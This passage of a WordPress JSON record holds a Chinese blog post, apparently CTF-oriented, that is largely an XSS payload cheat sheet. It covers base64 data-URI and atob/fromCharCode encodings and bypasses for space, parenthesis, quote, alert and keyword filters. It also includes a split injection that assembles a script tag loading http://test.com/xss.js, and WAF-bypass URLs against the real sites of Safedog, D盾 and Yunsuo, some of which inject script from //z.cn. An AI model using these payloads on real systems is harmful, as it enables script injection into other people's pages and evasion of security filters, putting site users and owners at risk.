id=\"u8dd1784b\"><strong>\u6ce8\uff1ahref\u3001src\u7b49\u52a0\u8f7durl\u7684\u5c5e\u6027\u53ef\u4ee5\u4f7f\u7528\u4e09\u79cd\u6df7\u5408\u7f16\u7801\uff0con\u4e8b\u4ef6\u53ef\u4ee5\u4f7f\u7528html\u5b9e\u4f53\u7f16\u7801\u548cjs\u7f16\u7801\u6df7\u5408\uff0c\u4f46url\u7f16\u7801\u5728on\u4e8b\u4ef6\u4e2d\u4e0d\u4f1a\u89e3\u6790\u3002<\/strong><\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"XwLFl\">0x05. base64 \u7f16\u7801<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u3172898f\"><strong>base64 \u7f16\u7801\u901a\u5e38\u9700\u8981\u4f7f\u7528\u5230 data \u4f2a\u534f\u8bae\u3002<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ue0e5ac3b\"><strong>data \u534f\u8bae\u4f7f\u7528\u65b9\u6cd5\uff1a<\/strong><code><strong>data:\u8d44\u6e90\u7c7b\u578b;\u7f16\u7801,\u5185\u5bb9<\/strong><\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u316bb89d\">base64\u7f16\u7801\u5185\u5bb9\u4e3a<\/p>\n\n\n\n<pre id=\"eCYKk\" class=\"wp-block-code\"><code>&lt;script&gt;alert(\/xss\/)&lt;\/script&gt;\nPHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ub83002b3\">\u901a\u5e38\u4e0e base64 \u7f16\u7801\u914d\u5408 data \u534f\u8bae\u7684\u6807\u7b7e\u6709 <strong>&lt;object&gt;\u3001&lt;a&gt;\u3001&lt;iframe&gt;<\/strong><\/p>\n\n\n\n<pre id=\"KTTQr\" class=\"wp-block-code\"><code>1.&lt;object&gt; \u6807\u7b7e\n&lt;object data=\"data:text\/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=\"&gt;&lt;\/object&gt;\n2.&lt;a&gt; \u6807\u7b7e\n&lt;a href=\"data:text\/html;base64, PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=\"&gt;test&lt;\/a&gt;   \uff08\u65b0\u7248\u6d4f\u89c8\u5668\u4e0d\u652f\u6301\uff09\n3.&lt;iframe&gt; \u6807\u7b7e\n&lt;iframe src=\"data:text\/html;base64, PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=\"&gt;&lt;\/iframe&gt;\n4.&lt;embed&gt; \u6807\u7b7e\n&lt;embed src=\"data:text\/html;base64, PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=\"&gt;&lt;\/embed&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u387161ba\"><strong>atob \u51fd\u6570<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u01bac257\">atob() \u65b9\u6cd5\u7528\u4e8e\u89e3\u7801\u4f7f\u7528 base-64 \u7f16\u7801\u7684\u5b57\u7b26\u4e32\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"uff4b1956\">\u8bed\u6cd5\uff1a<code>window.atob(encodedStr)<\/code>(encodedStr: \u5fc5\u9700\uff0c\u662f\u4e00\u4e2a\u901a\u8fc7 btoa() \u65b9\u6cd5\u7f16\u7801\u7684\u5b57\u7b26\u4e32)<\/p>\n\n\n\n<pre id=\"pAd5s\" class=\"wp-block-code\"><code>1.&lt;a href=javascript:eval(atob('YWxlcnQoMSk='))&gt;test&lt;\/a&gt;\n2.&lt;a href=javascript:eval(window.atob('YWxlcnQoMSk='))&gt;test&lt;\/a&gt;\n3.&lt;a href=javascript:eval(window&#91;'atob']('YWxlcnQoMSk='))&gt;test&lt;\/a&gt;\n4.&lt;img src=x onmouseover=\"eval(window.atob('YWxlcnQoMSk='))\"&gt;\n5.&lt;img src=x onerror=\"eval(atob('YWxlcnQoMSk='))\"&gt;\n6.&lt;iframe src=\"javascript:eval(window&#91;'atob']('YWxlcnQoMSk='))\"&gt;&lt;\/iframe&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"FtsXc\">0x06. ascii \u7f16\u7801<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u40533dcd\">ascii \u7f16\u7801\u4e00\u822c\u914d\u5408<code>String.fromCharCode<\/code>\u4f7f\u7528\u3002<\/p>\n\n\n\n<pre id=\"lB2Ih\" class=\"wp-block-code\"><code>alert(1)\n\u5341\u8fdb\u5236\uff1a97, 108, 101, 114, 116, 40, 49, 41\n\u5341\u516d\u8fdb\u5236\uff1a0x61, 0x6C, 0x65, 0x72, 0x74, 0x28, 0x31, 0x29<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u29868f27\"><strong>\u5341\u8fdb\u5236<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u33e71580\">&lt;a href=&#8217;javascript:eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))&#8217;&gt;test&lt;\/a&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ub5c0d5b0\"><strong>\u5341\u516d\u8fdb\u5236<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u12231383\">&lt;a href=&#8217;javascript:eval(String.fromCharCode(0x61, 0x6C, 0x65, 0x72, 0x74, 0x28, 0x31, 0x29))&#8217;&gt;test&lt;\/a&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"uf977a6b0\"><br><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"X1iTI\">\u7a7a\u683c\u8fc7\u6ee4\u7ed5\u8fc7<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ua684c956\">&lt;html&gt;&lt;img<strong>AA<\/strong>src<strong>AA<\/strong>onerror<strong>BB<\/strong>=<strong>BB<\/strong>alert<strong>CC<\/strong>(1)<strong>DD<\/strong>&lt;\/html&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u9cbe3213\">A\u4f4d\u7f6e\u53ef\u586b\u5145 \/\uff0c\/123\/\uff0c%09\uff0c%0A\uff0c%0C\uff0c%0D\uff0c%20 B\u4f4d\u7f6e\u53ef\u586b\u5145 %09\uff0c%0A\uff0c%0C\uff0c%0D\uff0c%20 C\u4f4d\u7f6e\u53ef\u586b\u5145 %0B\uff0c\/**\/\uff0c\u5982\u679c\u52a0\u4e86\u53cc\u5f15\u53f7\uff0c\u5219\u53ef\u4ee5\u586b\u5145 %09\uff0c%0A\uff0c%0C\uff0c%0D\uff0c%20 D\u4f4d\u7f6e\u53ef\u586b\u5145 %09\uff0c%0A\uff0c%0C\uff0c%0D\uff0c%20\uff0c\/\/\uff0c&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ub5d83fc6\"><br><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"yDfee\">\u5706\u62ec\u53f7\u8fc7\u6ee4\u7ed5\u8fc7<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"NpIPc\">0x01. \u53cd\u5f15\u53f7\u66ff\u6362<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u9bfa4a9a\">&lt;script&gt;alert`1`&lt;\/script&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"f6ETJ\">0x02. throw \u7ed5\u8fc7<\/h3>\n\n\n\n<pre id=\"toD8N\" class=\"wp-block-code\"><code>&lt;video src onerror=\"javascript:window.onerror=alert;throw 1\"&gt;\n&lt;svg\/onload=\"window.onerror=eval;throw'=alert\\x281\\x29';\"&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ub294a916\"><br><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"dARUV\">\u5355\u5f15\u53f7\u8fc7\u6ee4\u7ed5\u8fc7<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"EG49K\">0x01. \u659c\u6760\u66ff\u6362<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"uf039c976\">&lt;script&gt;alert(\/xss\/)&lt;\/script&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"s9Rk5\">0x02. \u53cd\u5f15\u53f7\u66ff\u6362<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u5d9dec51\">&lt;script&gt;alert(`xss`)&lt;\/script&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ue6efa898\"><br><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"qBlnu\">alert \u8fc7\u6ee4\u7ed5\u8fc7<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"RW9g1\">0x01. prompt \u66ff\u6362<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u24f15946\">&lt;script&gt;prompt(\/xss\/)&lt;\/script&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"uOlLo\">0x02. confirm \u66ff\u6362<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u41cd6b45\">&lt;script&gt;confirm(\/xss\/)&lt;\/script&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"BId7B\">0x03. console.log \u66ff\u6362<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u88b611c1\">&lt;script&gt;console.log(3)&lt;\/script&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"OxNDj\">0x04. document.write \u66ff\u6362<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"uee0e805f\">&lt;script&gt;document.write(1)&lt;\/script&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"GNUxN\">0x05. base64 \u7ed5\u8fc7<\/h3>\n\n\n\n<pre id=\"ylyAG\" class=\"wp-block-code\"><code>&lt;img src=x onerror=\"Function`a${atob`YWxlcnQoMSk=`}```\"&gt;\n&lt;img src=x onerror=\"``.constructor.constructor`a${atob`YWxlcnQoMSk=`}```\"&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ucd0d0f67\"><br><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"eLDBK\">\u5173\u952e\u8bcd\u7f6e\u7a7a\u7ed5\u8fc7<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"u5ShY\">0x01. \u5927\u5c0f\u5199\u7ed5\u8fc7<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u3b85630f\">&lt;script&gt;alert(\/xss\/)&lt;\/script&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u21af7409\">\u53ef\u4ee5\u8f6c\u6362\u4e3a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u49337b6e\">&lt;ScRiPt&gt;AlErT(\/xss\/)&lt;\/sCrIpT&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"xaWsq\">0x02. \u5d4c\u5957\u7ed5\u8fc7<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ufdc32c4b\">\u5d4c\u5957&lt;script&gt;\u548c&lt;\/script&gt;\u7a81\u7834<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u7d5a275f\">&lt;script&gt;alert(\/xss\/)&lt;\/script&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u086c39dd\">\u53ef\u4ee5\u8f6c\u6362\u4e3a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u404b5bd8\">&lt;sc&lt;script&gt;ript&gt;alert(\/xss\/)&lt;\/sc&lt;\/script&gt;ript&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u83ff4e9f\"><br><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"Xf9zh\">\u51fd\u6570\u62fc\u63a5<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"vpYXY\">0x01. eval<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"uf4a6c4e3\">&lt;img src=&#8221;x&#8221; onerror=&#8221;eval(&#8216;al&#8217;+&#8217;ert(1)&#8217;)&#8221;&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"DbsQs\">0x02. top<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u85e9846c\">&lt;img src=&#8221;x&#8221; onerror=&#8221;top[&#8216;al&#8217;+&#8217;ert&#8217;](1)&#8221;&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"xXv1o\">0x03. window<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u666169bf\">&lt;img src=&#8221;x&#8221; onerror=&#8221;window[&#8216;al&#8217;+&#8217;ert&#8217;](1)&#8221;&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"xoCpH\">0x04. self<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u423b4395\">&lt;img src=&#8221;x&#8221; onerror=&#8221;self[`al`+`ert`](1)&#8221;&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Com3J\">0x05. parent<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"uae558362\">&lt;img src=&#8221;x&#8221; onerror=&#8221;parent[`al`+`ert`](1)&#8221;&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Yw2VX\">0x06. frames<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"uf5756f69\">&lt;img src=&#8221;x&#8221; onerror=&#8221;frames[`al`+`ert`](1)&#8221;&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"eQxXM\">0x07. \u5e38\u7528\u51fd\u6570<\/h3>\n\n\n\n<pre id=\"g1v9k\" class=\"wp-block-code\"><code>&lt;img src=\"x\" onerror=\"eval(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"open(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"document.write(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"setTimeout(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"setInterval(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"Set.constructor(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"Map.constructor(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"Array.constructor(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"WeakSet.constructor(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"constructor.constructor(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"&#91;1].map(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"&#91;1].find(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"&#91;1].every(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"&#91;1].filter(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"&#91;1].forEach(alert(1))\"&gt;\n&lt;img src=\"x\" onerror=\"&#91;1].findIndex(alert(1))\"&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u3dc5a8be\"><br><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"SeLXt\">\u8d4b\u503c\u62fc\u63a5<\/h2>\n\n\n\n<pre id=\"fXKsb\" class=\"wp-block-code\"><code>&lt;img src onerror=_=alert,_(1)&gt;\n&lt;img src x=al y=ert onerror=top&#91;x+y](1)&gt;\n&lt;img src onerror=top&#91;a='al',b='ev',b+a]('alert(1)')&gt;\n&lt;img src onerror=&#91;'ale'+'rt'].map(top&#91;'ev'+'al'])&#91;0]&#91;'valu'+'eOf']()(1)&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"udd8a1206\"><br><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"Z3MnE\">\u706b\u72d0IE\u4e13\u5c5e<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u9864f1ca\">&lt;marquee onstart=alert(1)&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"uc3efc3c9\"><br><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"dRIXP\">\u62c6\u5206\u6cd5<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u77de4106\">\u5f53 Web \u5e94\u7528\u7a0b\u5e8f\u5bf9\u76ee\u6807\u7528\u6237\u7684\u8f93\u5165\u957f\u5ea6\u8fdb\u884c\u4e86\u9650\u5236\u65f6\uff0c\u8fd9\u65f6\u65e0\u6cd5\u6ce8\u5165\u8f83\u957f\u7684xss\u653b\u51fb\u5411\u91cf\uff0c\u4f46\u662f\u7279\u5b9a\u60c5\u51b5\u4e0b\uff0c\u8fd9\u79cd\u9650\u5236\u53ef\u4ee5\u901a\u8fc7\u62c6\u5206\u6cd5\u6ce8\u5165\u7684\u65b9\u5f0f\u8fdb\u884c\u7ed5\u8fc7\u3002<\/p>\n\n\n\n<pre id=\"GKb9P\" class=\"wp-block-code\"><code>&lt;script&gt;a='document.write(\"'&lt;\/script&gt;\n&lt;script&gt;a=a+'&lt;script src=ht'&lt;\/script&gt;\n&lt;script&gt;a=a+'tp:\/\/test.com\/xs'&lt;\/script&gt;\n&lt;script&gt;a=a+'s.js&gt;&lt;\/script&gt;\")'&lt;\/script&gt;\n&lt;script&gt;eval(a)&lt;\/script&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ua356c12c\">\u901a\u8fc7\u4e0a\u9762\u7684\u62c6\u5206\u6cd5\u53ef\u4ee5\u62fc\u51d1\u51fa\u4e0b\u9762\u5b8c\u6574\u7684\u653b\u51fb\u5411\u91cf\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u58c978de\">document.write(&#8220;&lt;script src = http:\/\/test.com\/xss.js&gt;&lt;\/script&gt;&#8221;)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u6608d659\"><br><\/p>\n\n\n\n<h1 class=\"wp-block-heading\" id=\"CPFvQ\">\u4e09\u3001\u7ed5\u8fc7 waf \u62e6\u622a<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"BkU1p\">\u5b89\u5168\u72d7<\/h3>\n\n\n\n<pre id=\"cazzr\" class=\"wp-block-code\"><code>http:&#47;&#47;www.safedog.cn\/index\/privateSolutionIndex.html?tab=2&lt;video\/src\/onerror=top&#91;`al`%2B`ert`](1);&gt;\nhttp:\/\/www.safedog.cn\/index\/privateSolutionIndex.html?tab=2&lt;video\/src\/onerror=appendChild(createElement(\"script\")).src=\"\/\/z.cn\"&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"kMpB8\">D\u76fe<\/h3>\n\n\n\n<pre id=\"DVF08\" class=\"wp-block-code\"><code>http:&#47;&#47;www.d99net.net\/News.asp?id=126&lt;video\/src\/onloadstart=top&#91;`al`%2B`ert`](1);&gt;\nhttp:\/\/www.d99net.net\/News.asp?id=126&lt;video\/src\/onloadstart=top&#91;a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`\/\/z.cn`);&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"GjjkL\">\u4e91\u9501+\u5947\u5b89\u4fe1 waf<\/h3>\n\n\n\n<pre id=\"sE7QL\" class=\"wp-block-code\"><code>http:&#47;&#47;www.yunsuo.com.cn\/ht\/dynamic\/20190903\/259.html?id=1&lt;video\/src\/onloadstart=top&#91;`al`%2B`ert`](1);&gt;\nhttp:\/\/www.yunsuo.com.cn\/ht\/dynamic\/20190903\/259.html?id=1&lt;video\/src\/onloadstart=top&#91;a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`\/\/z.cn`);&gt;<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>XSS\u8de8\u7ad9 0x01. &lt;a&gt; \u6807\u7b7e 0x02. &lt;img&gt;\u6807\u7b7e 0x03. &lt; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":644,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-605","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\u5e38\u7528XSS - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/koishi.team\/index.php\/2025\/06\/27\/\u5e38\u7528xss\/\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u5e38\u7528XSS - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c\" \/>\n<meta property=\"og:description\" content=\"XSS\u8de8\u7ad9 0x01. &lt;a&gt; \u6807\u7b7e 0x02. &lt;img&gt;\u6807\u7b7e 0x03. &lt; [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/koishi.team\/index.php\/2025\/06\/27\/\u5e38\u7528xss\/\" \/>\n<meta property=\"og:site_name\" content=\"\u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c\" \/>\n<meta property=\"article:published_time\" content=\"2025-06-27T14:36:17+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-07-02T12:49:49+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/koishi.team\/wp-content\/uploads\/2025\/06\/7949f6cb5999c877c7a5104af560e65fc603f0eff47737c58b5963a31128760a-1024x576.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"576\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Speeder\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/77992108_p0-1-scaled.jpg\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"Speeder\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2025\\\/06\\\/27\\\/%e5%b8%b8%e7%94%a8xss\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2025\\\/06\\\/27\\\/%e5%b8%b8%e7%94%a8xss\\\/\"},\"author\":{\"name\":\"Speeder\",\"@id\":\"https:\\\/\\\/koishi.team\\\/#\\\/schema\\\/person\\\/61a09d37ac9078d28245c5e1502a58c3\"},\"headline\":\"\u5e38\u7528XSS\",\"datePublished\":\"2025-06-27T14:36:17+00:00\",\"dateModified\":\"2025-07-02T12:49:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2025\\\/06\\\/27\\\/%e5%b8%b8%e7%94%a8xss\\\/\"},\"wordCount\":739,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/#\\\/schema\\\/person\\\/61a09d37ac9078d28245c5e1502a58c3\"},\"image\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2025\\\/06\\\/27\\\/%e5%b8%b8%e7%94%a8xss\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/06\\\/7949f6cb5999c877c7a5104af560e65fc603f0eff47737c58b5963a31128760a.jpg\",\"articleSection\":[\"CTF\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/koishi.team\\\/index.php\\\/2025\\\/06\\\/27\\\/%e5%b8%b8%e7%94%a8xss\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2025\\\/06\\\/27\\\/%e5%b8%b8%e7%94%a8xss\\\/\",\"url\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2025\\\/06\\\/27\\\/%e5%b8%b8%e7%94%a8xss\\\/\",\"name\":\"\u5e38\u7528XSS - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2025\\\/06\\\/27\\\/%e5%b8%b8%e7%94%a8xss\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2025\\\/06\\\/27\\\/%e5%b8%b8%e7%94%a8xss\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/06\\\/7949f6cb5999c877c7a5104af560e65fc603f0eff47737c58b5963a31128760a.jpg\",\"datePublished\":\"2025-06-27T14:36:17+00:00\",\"dateModified\":\"2025-07-02T12:49:49+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2025\\\/06\\\/27\\\/%e5%b8%b8%e7%94%a8xss\\\/#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/koishi.team\\\/index.php\\\/2025\\\/06\\\/27\\\/%e5%b8%b8%e7%94%a8xss\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2025\\\/06\\\/27\\\/%e5%b8%b8%e7%94%a8xss\\\/#primaryimage\",\"url\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/06\\\/7949f6cb5999c877c7a5104af560e65fc603f0eff47737c58b5963a31128760a.jpg\",\"contentUrl\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/06\\\/7949f6cb5999c877c7a5104af560e65fc603f0eff47737c58b5963a31128760a.jpg\",\"width\":2560,\"height\":1440},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2025\\\/06\\\/27\\\/%e5%b8%b8%e7%94%a8xss\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/koishi.team\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u5e38\u7528XSS\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/koishi.team\\\/#website\",\"url\":\"https:\\\/\\\/koishi.team\\\/\",\"name\":\"\u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c\",\"description\":\"\u300cSubterranean Rose\u300d\",\"publisher\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/#\\\/schema\\\/person\\\/61a09d37ac9078d28245c5e1502a58c3\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/koishi.team\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-Hans\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/koishi.team\\\/#\\\/schema\\\/person\\\/61a09d37ac9078d28245c5e1502a58c3\",\"name\":\"Speeder\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/75732553_p0-150x150.jpg\",\"url\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/75732553_p0-150x150.jpg\",\"contentUrl\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/75732553_p0-150x150.jpg\",\"caption\":\"Speeder\"},\"logo\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/75732553_p0-150x150.jpg\"},\"sameAs\":[\"https:\\\/\\\/koishi.team\"],\"url\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/author\\\/speeder\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u5e38\u7528XSS - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/koishi.team\/index.php\/2025\/06\/27\/\u5e38\u7528xss\/","og_locale":"zh_CN","og_type":"article","og_title":"\u5e38\u7528XSS - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","og_description":"XSS\u8de8\u7ad9 